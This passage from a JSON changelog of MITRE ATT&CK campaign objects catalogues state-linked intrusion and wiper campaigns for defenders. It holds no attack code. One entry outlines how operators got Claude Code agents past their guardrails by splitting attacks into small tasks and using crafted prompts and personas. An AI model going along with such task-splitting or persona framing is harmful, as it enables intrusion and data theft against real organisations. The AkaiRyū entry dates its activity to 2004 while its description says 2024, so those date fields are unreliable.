nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;exploiting&nbsp;internet-facing&nbsp;edge&nbsp;devices&nbsp;and&nbsp;transferring&nbsp;ac</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">cess&nbsp;to&nbsp;[Volt&nbsp;Typhoon](https://attack.mitre.org/groups/G1017</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">),&nbsp;also&nbsp;tracked&nbsp;as&nbsp;VOLTZITE,&nbsp;for&nbsp;follow-on&nbsp;operations.&nbsp;(Cita</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tion:&nbsp;Dragos&nbsp;2025&nbsp;Year&nbsp;in&nbsp;Review)</span></td></tr>\n        </tbody>\n    </table>"
                }
            ],
            "revocations": [],
            "deprecations": [],
            "deletions": []
        },
        "campaigns": {
            "additions": [
                {
                    "type": "campaign",
                    "spec_version": "2.1",
                    "id": "campaign--a6aba167-5ada-4812-9da1-912c0e73335d",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-22 19:33:22.532000+00:00",
                    "modified": "2026-04-23 23:21:30.984000+00:00",
                    "name": "2025 Poland Wiper Attacks",
                    "description": "[2025 Poland Wiper Attacks](https://attack.mitre.org/campaigns/C0063) is a Russian state-sponsored campaign that conducted destructive cyberattacks against Polish energy infrastructure in December 2025. Targets included more than 30 wind and photovoltaic farms, a combined heat and power (CHP) plant, and a manufacturing sector company. The attacks on the distributed energy resources (DER) disrupted communications between affected facilities and the distribution system operator, but did not impact electricity generation or heat supply. Across the campaign, threat actors deployed two previously undocumented wiper tools, [DynoWiper](https://attack.mitre.org/software/S9038), a Windows-based wiper and [LazyWiper](https://attack.mitre.org/software/S9039), a PowerShell wiper, distributed via malicious Group Policy Objects. At the CHP plant, threat actors had maintained access since at least March 2025, using that foothold to obtain credentials and move laterally before attempting wiper deployment. Some reporting has assessed the activity to be consistent with Russian Federal Security Service (FSB) threat activity group [Dragonfly](https://attack.mitre.org/groups/G0035), also tracked as STATIC TUNDRA, while other reporting attributes the destructive wiper activities to the Russian General Staff Main Intelligence Directorate (GRU) threat activity group ELECTRUM, also tracked as [Sandworm Team](https://attack.mitre.org/groups/G0034).(Citation: CERT Polska)(Citation: Dragos ELECTRUM JAN 2026)(Citation: ESET DynoWiper JAN 2026)(Citation: ESET DynoWiper Update JAN 2026)",
                    "aliases": [
                        "2025 Poland Wiper Attacks",
                        "2025 Poland Wiper Campaign"
                    ],
                    "first_seen": "2025-03-01 05:00:00+00:00",
                    "last_seen": "2025-12-01 05:00:00+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/campaigns/C0063",
                            "external_id": "C0063"
                        },
                        {
                            "source_name": "CERT Polska",
                            "description": "CERT Polska. (2026, January 30). Energy Sector Incident  Report \u2013 29 December. Retrieved April 22, 2026.",
                            "url": "https://cert.pl/uploads/docs/CERT_Polska_Energy_Sector_Incident_Report_2025.pdf"
                        },
                        {
                            "source_name": "ESET DynoWiper Update JAN 2026",
                            "description": "ESET. (2026, January 30). DynoWiper update: Technical analysis and attribution. Retrieved April 22, 2026.",
                            "url": "https://www.welivesecurity.com/en/eset-research/dynowiper-update-technical-analysis-attribution/"
                        },
                        {
                            "source_name": "ESET DynoWiper JAN 2026",
                            "description": "ESET. (2026, January 30). Russian Sandworm group attacks energy company in Poland with DynoWiper, ESET Research discovers. Retrieved April 22, 2026.",
                            "url": "https://www.eset.com/us/about/newsroom/research/eset-research-russian-sandwormapt-attacks-energy-company-poland-with-dynowiper/"
                        },
                        {
                            "source_name": "Dragos ELECTRUM JAN 2026",
                            "description": "https://5943619.hs-sites.com/hubfs/Reports/dragos-2025-poland-attack-report.pdf. (2026, January). ELECTRUM: CYBER ATTACK ON POLAND\u2019S ELECTRIC SYSTEM 2025. Retrieved April 22, 2026.",
                            "url": "https://5943619.hs-sites.com/hubfs/Reports/dragos-2025-poland-attack-report.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Dragos Threat Intelligence"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_first_seen_citation": "(Citation: CERT Polska)(Citation: Dragos ELECTRUM JAN 2026)",
                    "x_mitre_last_seen_citation": "(Citation: CERT Polska)(Citation: Dragos ELECTRUM JAN 2026)",
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "campaign",
                    "spec_version": "2.1",
                    "id": "campaign--590cd5b0-2421-4158-84a2-db13b5db02a3",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-20 19:08:41.632000+00:00",
                    "modified": "2026-04-23 23:45:31.444000+00:00",
                    "name": "Anthropic AI-orchestrated Campaign",
                    "description": "The [Anthropic AI-orchestrated Campaign](https://attack.mitre.org/campaigns/C0062) was conducted in September 2025 by a likely China nexus espionage actor identified as GTG-1002. The [Anthropic AI-orchestrated Campaign](https://attack.mitre.org/campaigns/C0062) was a highly coordinated operation that manipulated Claude Code to perform reconnaissance, vulnerability discovery, exploitation, lateral movement, credential harvesting, data analysis, and exfiltration operations at approximately 30 entities in the technology, financial, chemical, and government sectors. During the [Anthropic AI-orchestrated Campaign](https://attack.mitre.org/campaigns/C0062), human operators used Claude Code agents and Model Context Protocol (MCP) tools to automate cyber operations. Operators broke attacks into discrete tasks, used crafted prompts,  and established personas to bypass AI guardrails, enabling the agents to execute the operations with minimal human involvement.(Citation: Anthropic AI Orchestrated Campaign NOV 2025)(Citation: Anthropic Disrupting AI Espionage NOV 2025) ",
                    "aliases": [
                        "Anthropic AI-orchestrated Campaign"
                    ],
                    "first_seen": "2025-09-01 04:00:00+00:00",
                    "last_seen": "2025-09-01 04:00:00+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/campaigns/C0062",
                            "external_id": "C0062"
                        },
                        {
                            "source_name": "Anthropic Disrupting AI Espionage NOV 2025",
                            "description": "Anthropic. (2025, November 13). Disrupting the first reported AI-orchestrated cyber espionage campaign. Retrieved April 20, 2026.",
                            "url": "https://www.anthropic.com/news/disrupting-AI-espionage"
                        },
                        {
                            "source_name": "Anthropic AI Orchestrated Campaign NOV 2025",
                            "description": "Anthropic. (2025, November). Disrupting the first reported AI-orchestrated cyber espionage campaign. Retrieved April 20, 2026.",
                            "url": "https://assets.anthropic.com/m/ec212e6566a0d47/original/Disrupting-the-first-reported-AI-orchestrated-cyber-espionage-campaign.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_first_seen_citation": "(Citation: Anthropic AI Orchestrated Campaign NOV 2025)(Citation: Anthropic Disrupting AI Espionage NOV 2025)",
                    "x_mitre_last_seen_citation": "(Citation: Anthropic AI Orchestrated Campaign NOV 2025)(Citation: Anthropic Disrupting AI Espionage NOV 2025)",
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "campaign",
                    "spec_version": "2.1",
                    "id": "campaign--8a7c55ea-f363-4a03-b4c5-fa3fdb132d8f",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-17 20:03:43.454000+00:00",
                    "modified": "2026-04-24 02:25:15.505000+00:00",
                    "name": "Operation AkaiRy\u016b",
                    "description": "[Operation AkaiRy\u016b](https://attack.mitre.org/campaigns/C0060) (Japanese for RedDragon) was a cyberespionage spearphishing campaign conducted by [MirrorFace](https://attack.mitre.org/groups/G1054) between June and September 2024 against entities in Japan and Central Europe. [Operation AkaiRy\u016b](https://attack.mitre.org/campaigns/C0060) notably included the first reported targeting of a European entity by [MirrorFace](https://attack.mitre.org/groups/G1054), as well as their use of [UPPERCUT](https://attack.mitre.org/software/S0275), which was thought to be exclusive to [menuPass](https://attack.mitre.org/groups/G0045).(Citation: ESET MirrorFace 2025)(Citation: Trend Micro Earth Kasha Anel NOV 2024)",
                    "aliases": [
                        "Operation AkaiRy\u016b",
                        "AkaiRy\u016b"
                    ],
                    "first_seen": "2004-06-01 04:00:00+00:00",
                    "last_seen": "2004-09-01 04:00:00+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/campaigns/C0060",
                            "external_id": "C0060"
                        },
                        {
                            "source_name": "ESET MirrorFace 2025",
                            "description": " Dominik Breitenbacher. (2025, March 18). Operation AkaiRy\u016b: MirrorFace invites Europe to Expo 2025 and revives ANEL backdoor. Retrieved May 22, 2025.",
                            "url": "https://www.welivesecurity.com/en/eset-research/operation-akairyu-mirrorface-invites-europe-expo-2025-revives-anel-backdoor/"
                        },
                        {
                            "source_name": "Trend Micro Earth Kasha Anel NOV 2024",
                            "description": "Hiroaki, H. (2024, November 26). Guess Who\u2019s Back - The Return of ANEL in the Recent Earth Kasha Spear-phishing Campaign in 2024. Retrieved April 17, 2026.",
                            "url": "https://www.trendmicro.com/en_us/research/24/k/return-of-anel-in-the-recent-earth-kasha-spearphishing-campaign.html"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Dominik Breitenbacher, ESET"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_first_seen_citation": "(Citation: ESET MirrorFace 2025)(Citation: Trend Micro Earth Kasha Anel NOV 2024)",
                    "x_mitre_last_seen_citation": "(Citation: ESET MirrorFace 2025)",
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "campaign",
                    "spec_version": "2.1",
                    "id": "campaign--75ea699b-bff5-4541-b9b7-df4996c9db3c",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-19 18:07:20.152000+00:00",
                    "modified": "2026-04-24 02:28:18.653000+00:00",
                    "name": "Operation Digital Eye",
                    "description": "[Operation Digital Eye](https://attack.mitre.org/campaigns/C0061) was conducted in June and July of 2024 by suspected People's Republic of China (PRC)-nexus threat actors targeting business-to-business IT service providers in Southern Europe. [Operation Digital Eye](https://attack.mitre.org/campaigns/C0061) activity included the use of Visual Studio Code tunnels for command and control (C2) and custom lateral movement capabilities. Overlaps in tooling between Digital Eye and previous China-nexus campaigns, Operation Soft Cell and Operation Tainted Love, indicate the potential use of shared vendors or digital quartermasters.(Citation: sentinelone operationDigitalEye Dec 2024)",
                    "aliases": [
                        "Operation Digital Eye"
                    ],
                    "first_seen": "2024-06-01 04:00:00+00:00",
                    "last_seen": "2024-07-01 04:00:00+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/campaigns/C0061",
                            "external_id": "C0061"
                        },
                        {
                            "source_name": "sentinelone operationDigitalEye Dec 2024",
                            "description": "Aleksandar Milenkoski, Luigi Martire. (2024, December 10). Operation Digital Eye | Chinese APT Compromises Critical Digital Infrastructure via Visual Studio Code Tunnels. Retrieved February 27, 2025.",
                            "url": "https://www.sentinelone.com/labs/operation-digital-eye-chinese-apt-compromises-critical-digital-infrastructure-via-visual-studio-code-tunnels/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_first_seen_citation": "(Citation: sentinelone operationDigitalEye Dec 2024)",
                    "x_mitre_last_seen_citation": "(Citation: sentinelone operationDigitalEye Dec 2024)",
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.0"
                }
            ],
            "major_version_changes": [],
            "minor_version_changes": [
                {
                    "type": "campaign",
                    "spec_version": "2.1",
                    "id": "campaign--7e21077d-2589-43a7-a5f9-490061289526",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2024-08-06 20:52:19.002000+00:00",
                    "modified": "2026-04-23 02:24:58.492000+00:00",
                    "name": "HomeLand Justice",
                    "description": "[HomeLand Justice](https://attack.mitre.org/campaigns/C0038) was a disruptive cyber campaign conducted by Iranian state-affiliated actors against Albanian government networks in July and September 2022. The activity combined ransomware, wiper malware, and data leak operations. Initial access for [HomeLand Justice](https://attack.mitre.org/campaigns/C0038) was established as early as May 2021, and threat actors moved laterally, exfiltrated sensitive information, and maintained persistence for approximately 14 months prior to the destructive phase of the operation. Responsibility was claimed by the \"HomeLand Justice\" front, which framed the campaign as retaliation against the Mujahedeen-e Khalq (MEK), an Iranian opposition group with a presence in Albania. Multiple Iran-nexus groups are assessed to have participated in the campaign, including [HEXANE](https://attack.mitre.org/groups/G1001) who probed victim infrastructure.(Citation: Mandiant ROADSWEEP August 2022)(Citation: Microsoft Albanian Government Attacks September 2022)(Citation: CISA Iran Albanian Attacks September 2022) A second wave of attacks was launched in September 2022 using similar tactics following public attribution of the previous activity to Iran and the severing of diplomatic ties between Iran and Albania.(Citation: CISA Iran Albanian Attacks September 2022)\n\n",
                    "aliases": [
                        "HomeLand Justice"
                    ],
                    "first_seen": "2021-05-01 04:00:00+00:00",
                    "last_seen": "2022-09-01 04:00:00+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/campaigns/C0038",
                            "external_id": "C0038"
                        },
                        {
                            "source_name": "CISA Iran Albanian Attacks September 2022",
                            "description": "CISA. (2022, September 23). AA22-264A Iranian State Actors Conduct Cyber Operations Against the Government of Albania. Retrieved August 6, 2024.",
                            "url": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-264a"
                        },
                        {
                            "source_name": "Mandiant ROADSWEEP August 2022",
                            "description": "Jenkins, L. at al. (2022, August 4). ROADSWEEP Ransomware - Likely Iranian Threat Actor Conducts Politically Motivated Disruptive Activity Against Albanian Government Organizations. Retrieved August 6, 2024.",
                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/likely-iranian-threat-actor-conducts-politically-motivated-disruptive-activity-against/"
                        },
                        {
                            "source_name": "Microsoft Albanian Government Attacks September 2022",
                            "description": "MSTIC. (2022, September 8). Microsoft investigates Iranian attacks against the Albanian government. Retrieved August 6, 2024.",
                            "url": "https://www.microsoft.com/en-us/security/blog/2022/09/08/microsoft-investigates-iranian-attacks-against-the-albanian-government/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Aung Kyaw Min Naing, @Nolan"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_first_seen_citation": "(Citation: Mandiant ROADSWEEP August 2022)(Citation: Microsoft Albanian Government Attacks September 2022)(Citation: CISA Iran Albanian Attacks September 2022)",
                    "x_mitre_last_seen_citation": "(Citation: CISA Iran Albanian Attacks September 2022)",
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"dictionary_item_removed\": {\"root['x_mitre_domains']\": [\"enterprise-attack\"]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 02:24:58.492000+00:00\", \"old_value\": \"2024-10-31 16:06:50.414000+00:00\"}, \"root['description']\": {\"new_value\": \"[HomeLand Justice](https://attack.mitre.org/campaigns/C0038) was a disruptive cyber campaign conducted by Iranian state-affiliated actors against Albanian government networks in July and September 2022. The activity combined ransomware, wiper malware, and data leak operations. Initial access for [HomeLand Justice](https://attack.mitre.org/campaigns/C0038) was established as early as May 2021, and threat actors moved laterally, exfiltrated sensitive information, and maintained persistence for approximately 14 months prior to the destructive phase of the operation. Responsibility was claimed by the \\\"HomeLand Justice\\\" front, which framed the campaign as retaliation against the Mujahedeen-e Khalq (MEK), an Iranian opposition group with a presence in Albania. Multiple Iran-nexus groups are assessed to have participated in the campaign, including [HEXANE](https://attack.mitre.org/groups/G1001) who probed victim infrastructure.(Citation: Mandiant ROADSWEEP August 2022)(Citation: Microsoft Albanian Government Attacks September 2022)(Citation: CISA Iran Albanian Attacks September 2022) A second wave of attacks was launched in September 2022 using similar tactics following public attribution of the previous activity to Iran and the severing of diplomatic ties between Iran and Albania.(Citation: CISA Iran Albanian Attacks September 2022)\\n\\n\", \"old_value\": \"[HomeLand Justice](https://attack.mitre.org/campaigns/C0038) was a disruptive campaign involving the use of ransomware, wiper malware, and sensitive information leaks conducted by Iranian state cyber actors against Albanian government networks in July and September 2022. Initial access for [HomeLand Justice](https://attack.mitre.org/campaigns/C0038) was established in May 2021 as threat actors subsequently moved laterally, exfiltrated sensitive information, and maintained persistence for approximately 14 months prior to the attacks. Responsibility was claimed by the \\\"HomeLand Justice\\\" front whose messaging indicated targeting of the Mujahedeen-e Khalq (MEK), an Iranian opposition group who maintain a refugee camp in Albania, and were formerly designated a terrorist organization by the US State Department.(Citation: Mandiant ROADSWEEP August 2022)(Citation: Microsoft Albanian Government Attacks September 2022)(Citation: CISA Iran Albanian Attacks September 2022) A second wave of attacks was launched in September 2022 using similar tactics after public attribution of the previous activity to Iran and the severing of diplomatic ties between Iran and Albania.(Citation: CISA Iran Albanian Attacks September 2022)\\n\\n\", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1,2 @@\\n-[HomeLand Justice](https://attack.mitre.org/campaigns/C0038) was a disruptive campaign involving the use of ransomware, wiper malware, and sensitive information leaks conducted by Iranian state cyber actors against Albanian government networks in July and September 2022. Initial access for [HomeLand Justice](https://attack.mitre.org/campaigns/C0038) was established in May 2021 as threat actors subsequently moved laterally, exfiltrated sensitive information, and maintained persistence for approximately 14 months prior to the attacks. Responsibility was claimed by the \\\"HomeLand Justice\\\" front whose messaging indicated targeting of the Mujahedeen-e Khalq (MEK), an Iranian opposition group who maintain a refugee camp in Albania, and were formerly designated a terrorist organization by the US State Department.(Citation: Mandiant ROADSWEEP August 2022)(Citation: Microsoft Albanian Government Attacks September 2022)(Citation: CISA Iran Albanian Attacks September 2022) A second wave of attacks was launched in September 2022 using similar tactics after public attribution of the previous activity to Iran and the severing of diplomatic ties between Iran and Albania.(Citation: CISA Iran Albanian Attacks September 2022)\\n+[HomeLand Justice](https://attack.mitre.org/campaigns/C0038) was a disruptive cyber campaign conducted by Iranian state-affiliated actors against Albanian government networks in July and September 2022. The activity combined ransomware, wiper malware, and data leak operations. Initial access for [HomeLand Justice](https://attack.mitre.org/campaigns/C0038) was established as early as May 2021, and threat actors moved laterally, exfiltrated sensitive information, and maintained persistence for approximately 14 months prior to the destructive phase of the operation. Responsibility was claimed by the \\\"HomeLand Justice\\\" front, which framed the campaign as retaliation against the Mujahedeen-e Khalq (MEK), an Iranian opposition group with a presence in Albania. Multiple Iran-nexus groups are assessed to have participated in the campaign, including [HEXANE](https://attack.mitre.org/groups/G1001) who probed victim infrastructure.(Citation: Mandiant ROADSWEEP August 2022)(Citation: Microsoft Albanian Government Attacks September 2022)(Citation: CISA Iran Albanian Attacks September 2022) A second wave of attacks was launched in September 2022 using similar tactics following public attribution of the previous activity to Iran and the severing of diplomatic ties between Iran and Albania.(Citation: CISA Iran Albanian Attacks September 2022)\\n \"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to49__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to49__0\"><a href=\"#difflib_chg_to49__top\">t</a></td><td class=\"diff_header\" id=\"from49_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">[HomeLand&nbsp;Justice](https://attack.mitre.org/campaigns/C0038)</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to49__top\">t</a></td><td class=\"diff_header\" id=\"to49_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">[HomeLand&nbsp;Justice](https://attack.mitre.org/campaigns/C0038)</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;was&nbsp;a&nbsp;disruptive&nbsp;campaign&nbsp;involving&nbsp;the&nbsp;use&nbsp;of&nbsp;ransomware,&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;was&nbsp;a&nbsp;disruptive&nbsp;cyber&nbsp;campaign&nbsp;conducted&nbsp;by&nbsp;Iranian&nbsp;state-</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">wiper&nbsp;malware,&nbsp;and&nbsp;sensitive&nbsp;information&nbsp;leaks&nbsp;conducted&nbsp;by&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">affiliated&nbsp;actors&nbsp;against&nbsp;Albanian&nbsp;government&nbsp;networks&nbsp;in&nbsp;Ju</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Iranian&nbsp;state&nbsp;cyber&nbsp;actors&nbsp;against&nbsp;Albanian&nbsp;government&nbsp;netwo</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ly&nbsp;and&nbsp;September&nbsp;2022.&nbsp;The&nbsp;activity&nbsp;combined&nbsp;ransomware,&nbsp;wip</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">rks&nbsp;in&nbsp;July&nbsp;and&nbsp;September&nbsp;2022.&nbsp;Initial&nbsp;access&nbsp;for&nbsp;[HomeLand</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">er&nbsp;malware,&nbsp;and&nbsp;data&nbsp;leak&nbsp;operations.&nbsp;Initial&nbsp;access&nbsp;for&nbsp;[Ho</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;Justice](https://attack.mitre.org/campaigns/C0038)&nbsp;was&nbsp;esta</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">meLand&nbsp;Justice](https://attack.mitre.org/campaigns/C0038)&nbsp;wa</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">blished&nbsp;in&nbsp;May&nbsp;2021&nbsp;as&nbsp;threat&nbsp;actors&nbsp;subsequently&nbsp;moved&nbsp;late</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">s&nbsp;established&nbsp;as&nbsp;early&nbsp;as&nbsp;May&nbsp;2021,&nbsp;and&nbsp;threat&nbsp;actors&nbsp;moved&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">rally,&nbsp;exfiltrated&nbsp;sensitive&nbsp;information,&nbsp;and&nbsp;maintained&nbsp;per</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">laterally,&nbsp;exfiltrated&nbsp;sensitive&nbsp;information,&nbsp;and&nbsp;maintained</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">sistence&nbsp;for&nbsp;approximately&nbsp;14&nbsp;months&nbsp;prior&nbsp;to&nbsp;the&nbsp;attacks.&nbsp;R</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;persistence&nbsp;for&nbsp;approximately&nbsp;14&nbsp;months&nbsp;prior&nbsp;to&nbsp;the&nbsp;destru</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">esponsibility&nbsp;was&nbsp;claimed&nbsp;by&nbsp;the&nbsp;\"HomeLand&nbsp;Justice\"&nbsp;front&nbsp;wh</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ctive&nbsp;phase&nbsp;of&nbsp;the&nbsp;operation.&nbsp;Responsibility&nbsp;was&nbsp;claimed&nbsp;by&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ose&nbsp;messaging&nbsp;indicated&nbsp;targeting&nbsp;of&nbsp;the&nbsp;Mujahedeen-e&nbsp;Khalq&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">the&nbsp;\"HomeLand&nbsp;Justice\"&nbsp;front,&nbsp;which&nbsp;framed&nbsp;the&nbsp;campaign&nbsp;as&nbsp;r</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">(MEK),&nbsp;an&nbsp;Iranian&nbsp;opposition&nbsp;group&nbsp;who&nbsp;maintain&nbsp;a&nbsp;refugee&nbsp;ca</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">etaliation&nbsp;against&nbsp;the&nbsp;Mujahedeen-e&nbsp;Khalq&nbsp;(MEK),&nbsp;an&nbsp;Iranian&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">mp&nbsp;in&nbsp;Albania,&nbsp;and&nbsp;were&nbsp;formerly&nbsp;designated&nbsp;a&nbsp;terrorist&nbsp;orga</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">opposition&nbsp;group&nbsp;with&nbsp;a&nbsp;presence&nbsp;in&nbsp;Albania.&nbsp;Multiple&nbsp;Iran-n</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">nization&nbsp;by&nbsp;the&nbsp;US&nbsp;State&nbsp;Department.(Citation:&nbsp;Mandiant&nbsp;ROAD</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">exus&nbsp;groups&nbsp;are&nbsp;assessed&nbsp;to&nbsp;have&nbsp;participated&nbsp;in&nbsp;the&nbsp;campaig</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">SWEEP&nbsp;August&nbsp;2022)(Citation:&nbsp;Microsoft&nbsp;Albanian&nbsp;Government&nbsp;A</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">n,&nbsp;including&nbsp;[HEXANE](https://attack.mitre.org/groups/G1001)</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ttacks&nbsp;September&nbsp;2022)(Citation:&nbsp;CISA&nbsp;Iran&nbsp;Albanian&nbsp;Attacks&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span 